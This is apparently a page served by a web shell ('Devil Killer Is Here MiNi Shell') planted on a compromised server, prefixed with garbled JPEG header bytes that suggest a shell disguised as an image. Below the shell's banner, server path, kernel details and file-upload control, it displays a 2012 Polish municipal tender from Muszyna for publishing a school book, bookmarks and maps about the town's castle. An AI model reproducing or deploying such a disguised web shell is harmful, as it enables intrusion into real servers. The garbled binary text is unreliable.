JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120105/5679-N-2012.html

<p class="kh_header"><b>Muszyna: Poznajemy życie codzienne na muszyńskim zamku - wykonanie usługi wydawniczej</b><br>
<b>Numer ogłoszenia: 5679 - 2012; data zamieszczenia: 05.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Uzdrowiskowa Muszyna , Rynek 31, 33-370 Muszyna, woj. małopolskie, tel. 18 4714009, faks 18 4777921.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muszyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poznajemy życie codzienne na muszyńskim zamku - wykonanie usługi wydawniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usługi wydawniczej obejmującej opracowanie merytoryczne tekstu i redakcyjne w języku polskim, opracowanie fotograficzne, wykonanie streszczeń i ich tłumaczeń na język słowacki i angielski, projekt graficzny, redakcja techniczna, wykonanie techniczne, skład, korekta tekstów i techniczna, wykonanie próbnego wydruku do akceptacji przez Zamawiającego, przygotowanie do druku, druk, oprawa i dostawa do siedziby Zamawiającego dla projektu Poznajemy życie codzienne na muszyńskim zamku współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa za pośrednictwem Euroregionu Tatry w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska- Republika Słowacka 2007 - 2013, realizowanego przez Zamawiającego. 
2. Popularne wydawnictwo dla szkół pn. Życie codzienne na zamku w Muszynie .... 
A. Szczegółowy opis przedmiotu zamówienia: 
a) Wszystkie materiały niezbędne do wykonania wydawnictwa opracowuje i dostarcza Wykonawca. 
b) Wykonawca zobowiązany jest do przedłożenia do korekty Zamawiającemu teksty, zdjęcia, mapy, projekt graficzny, Zamawiający ma prawo dokonać, co najmniej 3 korekt przekazanych materiałów przez Wykonawcę. Zamawiający dokona każdej korekty w terminie 14 dni roboczych licząc od dnia przekazania materiałów do korekty przez Wykonawcę. 
c) Zawartość: Treść o charakterze popularnym skierowana do szkół z rysunkami, mająca na celu popularyzację wiedzy o zamku w Muszynie wśród młodego pokolenia. W swym zakresie obejmująca następującą problematykę: - tła historyczno-społecznego na jakim funkcjonował zamek muszyński, - wydarzeń historycznych związanych z zamkiem muszyńskim oraz postaciami jego mieszkańców, - rozwoju przestrzennego i funkcjonalnego zabudowy zamkowej, - wyposażenia i walorów wojskowych zamku i jego mieszkańców, - wyposażenia zamku w przedmioty codziennego użytku (rzemiosło, stroje, kuchnia itp.), - codziennego życia mieszkańców zamku, - analiz specjalistycznych dotyczących zabytków pozyskanych w trakcie badań archeologicznych. Tekst musi uwzględniać i wykorzystywać wyniki najnowszych badań archeologicznych prowadzonych na zamku muszyńskim oraz wyniki analiz specjalistycznych próbek pochodzenia roślinnego, analiz próbek pochodzenia zwierzęcego, analizy monet i in. W wydawnictwie należy wykorzystać rysunki zabytków metalowych, kamiennych, kościanych i ceramicznych, rekonstrukcje rysunkowe w/w zabytków oraz rysunki scenek rodzajowych, dokonać zakupu zdjęć do wykorzystania w publikacji, oraz wykorzystać analizy próbek pochodzenia roślinnego (do rozdziałów o budownictwie i pożywieniu), analizy próbek pochodzenia zwierzęcego (do rozdziału o pożywieniu), analizy monet (do rozdziału o kontaktach Muszyny ze światem). W celu zapoznania dzieci i młodzieży z dziejami i życiem na zamku tekst uzupełniony ma być ilustracjami: - fotografiami zamku, - fotografiami i grafikami archiwalnymi, - fotografiami zabytków archeologicznych, - fotografiami z przebiegu badań archeologicznych, - zrekonstruowanymi scenkami z życia zamku, - rysunkami zabytków pozyskanych w trakcie badań archeologicznych oraz rekonstrukcjami zabytków, - planem zamku/mapką odsłoniętych reliktów zamku lub odpowiednim widokiem perspektywicznym, - oraz ewentualnie innymi obrazującymi kulturę materialną i życie codzienne zamków oraz uwarunkowania socjotopograficzne zamku muszyńskiego. Liczba ilustracji, co najmniej 100. Fotografie powinny być wkomponowane w tekst w układzie nawiązującym do treści. Tekst w języku polskim, streszczenie wraz ze spisem ilustracji w języku słowackim i angielskim. 
d) Zakres usługi: opracowanie tekstu merytoryczne i redakcyjne w języku polskim, opracowanie fotograficzne, wykonanie streszczeń tekstu z tłumaczeniem na język słowacki i angielski, projekt graficzny, redakcja techniczna, wykonanie techniczne, skład, korekta tekstów i techniczna, wykonanie próbnego wydruku do akceptacji przez Zamawiającego, przygotowanie do druku, druk, oprawa i dostawa do siedziby Zamawiającego. 
e) Nakład: 3000 egz., format: A4, objętość: 88 stron. 
f) Zadruk: środek, papier kredowy mat, 115 g, kolor 4+4, okładka: papier kredowy mat 300 g, 4+0+ folia mat, wyklejka 0+0. 
g) Oprawa: szyto-klejona miękka. 
h) Publikacja posiada nr ISBN 978 - 83-930969-3-0. 
B. Zakładki do książek z motywami zamkowymi
a) Wszystkie materiały niezbędne do wykonania zakładek opracowuje i dostarcza Wykonawca. 
b) Wykonawca zobowiązany jest do przedłożenia do korekty Zamawiającemu projekt graficzny, Zamawiający ma prawo dokonać, co najmniej 3 korekt przekazanych materiałów przez Wykonawcę. Zamawiający dokona każdej korekty w terminie 14 dni roboczych licząc od dnia przekazania materiałów do korekty przez Wykonawcę. 
c) Zawartość: Treść w formie atrakcyjnej estetycznie grafiki. Układ graficzny i stylistyczny spójny ze stylistyką wydawnictwo dla szkół pn. Życie codzienne na zamku w Muszynie ..... Możliwe zapożyczenia i adaptacje grafiki wykorzystywanej w książce. Pożądane wykorzystanie w grafice rysunków zabytków, rycin i fotografii zamku lub rekonstrukcji zabytków i scen z życia codziennego zamku. 
d) Zakres usługi: projekt graficzny, redakcja techniczna, wykonanie techniczne, skład, korekta, przygotowanie do druku, wykonanie próbnego wydruku do akceptacji przez Zamawiającego, druk, dostawa do siedziby Zamawiającego. 
e) Nakład: 3000 egz., format: 40x250 mm 
f) Zadruk: środek, papier kredowy błysk, 300 g, kolor 4+4, folia 1+1, lakier UV wyb. 1+1. 
C. Mapki zamku w Muszynie 
a) Wszystkie materiały niezbędne do wykonania map opracowuje i dostarcza Wykonawca. 
b) Wykonawca zobowiązany jest do przedłożenia do korekty Zamawiającemu teksty, zdjęcia, mapy, projekt graficzny, Zamawiający ma prawo dokonać, co najmniej 3 korekt przekazanych materiałów przez Wykonawcę. Zamawiający dokona każdej korekty w terminie 14 dni roboczych licząc od dnia przekazania materiałów do korekty przez Wykonawcę. 
c) Zawartość: Treść o charakterze popularnym łącząca przedstawienie zamku z opisem lub komentarzem oraz grafikami i fotografiami, mająca na celu popularyzację wiedzy o zamku w Muszynie. Układ graficzny i stylistyczny spójny ze stylistyką wydawnictwo dla szkół pn. Życie codzienne na zamku w Muszynie ..... Możliwe zapożyczenia i adaptacje grafiki wykorzystywanej w wydawnictwie dla szkół. Pożądane wykorzystanie w grafice rysunków zabytków, rycin i fotografii zamku lub rekonstrukcji zabytków i scen z życia codziennego zamku. Treść mapy: - widok zamku - np. perspektywiczny z góry lub skośny umożliwiający ilustrację najbliższego otoczenia, wykonany w technice i stylistyce dowolnej np.: grafika fotorealistyczna, rysunek realistyczny, rysunek stylizowany, - rekonstrukcja zamku - widok perspektywiczny skośny lub inny umożliwiający zobrazowanie najistotniejszych elementów zamku i otoczenia, wykonany w technice i stylistyce dowolnej np.: grafika fotorealistyczna, rysunek realistyczny, rysunek stylizowany - lokalizacja zamku w szerszym otoczeniu (np. skala około 1:2000), wykonany w technice i stylistyce standardowej mapy topograficzno-turystycznej lub stylizowanej. Przyjęta technika powinna umożliwić łatwe odczytywanie na mapie poszczególnych elementów zamku (możliwe wklejenie powiększenia planu zamku na tle mapy okolicy). Dopuszczalna treść pozostałych elementów: - tekst o charakterze popularnym przedstawiający skrótowo podstawowe informacje o zamku oraz w miarę możliwości poruszający problematykę: tła historyczno-społecznego na jakim funkcjonował zamek muszyński, wydarzeń historycznych związanych z zamkiem muszyńskim oraz postaciami jego mieszkańców, rozwoju przestrzennego i funkcjonalnego zabudowy zamkowej, wyposażenia i walorów wojskowych zamku i jego mieszkańców, wyposażenia zamku w przedmioty codziennego użytku (rzemiosło, stroje, kuchnia itp.), codziennego życia mieszkańców zamku. Tekst musi uwzględniać (być zgodny z ich wynikami) wyniki najnowszych badań archeologicznych prowadzonych na zamku muszyńskim. Tekst powinien być uzupełniony ilustracjami obrazującymi przedstawione w tekście informacje oraz ilustracjami wzbogacającymi estetykę wydawnictwa, np.: fotografiami zamku, fotografiami i grafikami archiwalnymi, fotografiami zabytków archeologicznych, fotografiami z przebiegu badań archeologicznych, zrekonstruowanymi scenkami z życia zamku, rysunkami zabytków pozyskanych w trakcie badań archeologicznych oraz rekonstrukcjami zabytków, planem zamku/mapką odsłoniętych reliktów zamku lub odpowiednim widokiem perspektywicznym lub innymi obrazującymi historię, kulturę materialną i życie codzienne zamku w Muszynie. 
d) Zakres usługi: opracowanie tekstu merytoryczne i redakcyjne w języku polskim, opracowanie fotograficzne, wykonanie streszczeń tekstu z tłumaczeniem na język słowacki i angielski, opracowanie fotograficzne, projekt graficzny, redakcja techniczna, wykonanie techniczne, skład, korekta tekstów i techniczna, przygotowanie do druku, wykonanie próbnego wydruku do akceptacji przez Zamawiającego, druk i dostawa do siedziby Zamawiającego. 
e) Nakład: 3000 egz., format: A2 składane do A5 
f) Zadruk: środek, papier kredowy silk 115 g, kolor 4+4 
g) Inne informacje: mapka dwustronna, falcowana. 
D. Zaproszenia na wystawę zabytków połączonej z rozstrzygnięciem konkursu na pracę pt. Jak sobie wyobrażam zamki w Kamienicy, Muszynie w przyszłości - jak powinny być odbudowane i jaką rolę mogą spełniać w życiu lokalnych społeczności? 
a) Wszystkie materiały niezbędne do wykonania zaproszeń opracowuje i dostarcza Wykonawca. 
b) Wykonawca zobowiązany jest do przedłożenia do korekty Zamawiającemu projekt graficzny, Zamawiający ma prawo dokonać, co najmniej 3 korekt przekazanych materiałów przez Wykonawcę. Zamawiający dokona każdej korekty w terminie 14 dni roboczych licząc od dnia przekazania materiałów do korekty przez Wykonawcę. 
c) Zawartość: Treść w formie atrakcyjnej estetycznie. Układ graficzny i stylistyczny spójny ze stylistyką wydawnictwo dla szkół pn. Życie codzienne na zamku w Muszynie ..... Możliwe zapożyczenia i adaptacje grafiki wykorzystywanej w książce. 
d) Zakres usługi: projekt graficzny, redakcja techniczna, wykonanie techniczne, skład, korekta, przygotowanie do druku, wykonanie próbnego wydruku do akceptacji przez Zamawiającego, druk, dostawa do siedziby Zamawiającego. 
e) Nakład: 50 egz., format: A4 składany do A5 lub zgodny z formatem koperty DL, 
f) Zadruk: papier kredowy mat. 250g, kolor 4+4, lakier lub folia błysk 1+0. E. Sposób wykonania przedmiotu zamówienia 
1. Wykonawca zobowiązany jest wykonać prace, o których mowa w rozdziale I Przedmiot zamówienia wg najlepszej wiedzy i z największą starannością jakościowo dobrze zgodnie z zasadami współczesnej sztuki drukarskiej oraz z obowiązującymi w tym zakresie przepisami. 
2. Wykonawca powinien posiadać kwalifikacje i uprawnienia, jak również wyposażenie techniczne niezbędne do wykonania przedmiotu zamówienia. 3. Wykonawca przedstawi Zamawiającemu do akceptacji projekty graficzne oraz wydruki próbne publikacji, o których mowa w rozdziale I Przedmiot zamówienia. W przypadku nie zaakceptowania przez Zamawiającego przedstawionych projektów graficznych oraz wydruków Wykonawca na własny koszt dokona niezbędnych zmian w terminie wskazanym przez Zamawiającego. 
4. Wykonawca przedstawi Zamawiającemu do akceptacji po dwa egzemplarze sygnalne z każdego tytułu publikacji. W przypadku stwierdzenia wad w wykonanych publikacjach, Wykonawca usunie wady na własny koszt w terminie wskazanym przez Zamawiającego. 
5. Wykonawca zobowiązany jest zapewnić podczas transportu takie zabezpieczenie publikacji, jakie jest wymagane, aby nie dopuścić do ich uszkodzenia lub pogorszenia ich jakości w trakcie transportu. Na każdym opakowaniu umieści tytuł publikacji i liczbę egzemplarzy w paczce. 
6. W przypadku stwierdzenia wad związanych z odstępstwem od warunków zawartych w opisie przedmiotu umowy lub wad technicznych w dostarczonych publikacjach w okresie 3 miesięcy licząc od daty podpisania protokołu zdawczo-odbiorczego, Wykonawca zobowiązuje się na żądanie Zamawiającego w ciągu 21 dni wydrukować nieodpłatnie publikacje bez wad i dostarczyć je do siedziby Zamawiającego. 
F. Ustalenia i wymagania dodatkowe Wykonawca w wydawnictwach, o których mowa w rozdziale I zobowiązany jest do zamieszczenie: 
1) logo Unii Europejskiej, Programu Współpracy Transgranicznej Rzeczpospolita Polska-Republika Słowacka 2007-2013, Euroregionu TATRY oraz herbu Miasta i Gminy Uzdrowiskowej Muszyna, których wzory zostaną przekazane Wykonawcy przez Zamawiającego, 
2) informacji na temat współfinansowania wydawnictw: - w języku polskim: Publikacja współfinansowana przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego oraz z budżetu państwa za pośrednictwem Euroregionu Tatry w ramach Programu Współpracy Transgranicznej Rzeczpospolita Polska-Republika Słowacka 2007-2013, - w języku słowackim: Publikacia spolufinancovana Európskou uniou z Európskeho fondu regionálneho rozvoja a statneho rozpoctu prostredníctvom Euroregiónu Tatry v ramci Programu cezhranicnej spolupráce Posko-Slovenska republika 2007-2013, 
3) adnotacji o następującej treści: Wyłączną odpowiedzialność za treść niniejszej publikacji ponosi Miasto i Gmina Uzdrowiskowa Muszyna i w żadnym razie nie może ona być utożsamiana z oficjalnym stanowiskiem Unii Europejskiej ani Euroregionu Tatry, oraz przetłumaczenie na język słowacki i zamieszczenie w wydawnictwach, 
4) adnotacji - egzemplarz bezpłatny,
5) adnotacja egzemplarz bezpłatny nie dotyczy zaproszeń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z zapisem art. 67 ust. 1 pkt  6 ustawy- Prawo zamówień Publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2, 79.81.00.00-5, 79.82.00.00-8, 79.82.25.00-7, 79.82.20.00-2, 79.82.11.00-6, 79.82.10.00-5, 79.82.30.00-9, 79.96.00.00-1, 92.31.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia lub dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia lub dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia lub dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia lub dokumenty wg. metody spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga także dołączenia do oferty: 
1) wypełnionego druku oferty, 
2) wypełnionego kosztorysu ślepego prac 
3) pełnomocnictwa dla osoby składającej ofertę w przypadku działania Wykonawcy przez pełnomocnika 
4) pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego 
5) kopii dowodu wpłaty wadium . W pozostałych przypadkach należy załączyć do oferty oryginalny dokument wniesienia wadium. 
Obowiązujące zasady! 
1) Dokumenty muszą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, 
2) Pełnomocnictwo należy dołączyć w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian
1. Zamawiający przewiduje następujące zmiany istotnych postanowień umowy: 
1) Zmiana terminu przewidzianego na wykonanie umowy jest możliwa w przypadku: 
a. Zmian spowodowanych warunkami atmosferycznymi, w szczególności klęski żywiołowe, warunki atmosferyczne odbiegające od typowych uniemożliwiające realizację zamówienia 
b. Innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy, skutkujących niemożliwością realizacji zamówienia lub wykonania innych czynności przewidzianych umowy 
2) Pozostałe rodzaje zmian spowodowane następującymi okolicznościami: a. Zmiana w zakresie podwykonawcy i zakresu realizowanych przez niego dostaw jest możliwa za uprzednią zgodą Zamawiającego zgodnie z art. 647 KC. 
b. Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy 
c. Zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy, 
d. Ustawowa zmiana stawki podatku Vat 
e. Zmiana miejsca dostawy 
f. Zmiana ilości poszczególnych pakietów zamówienia 
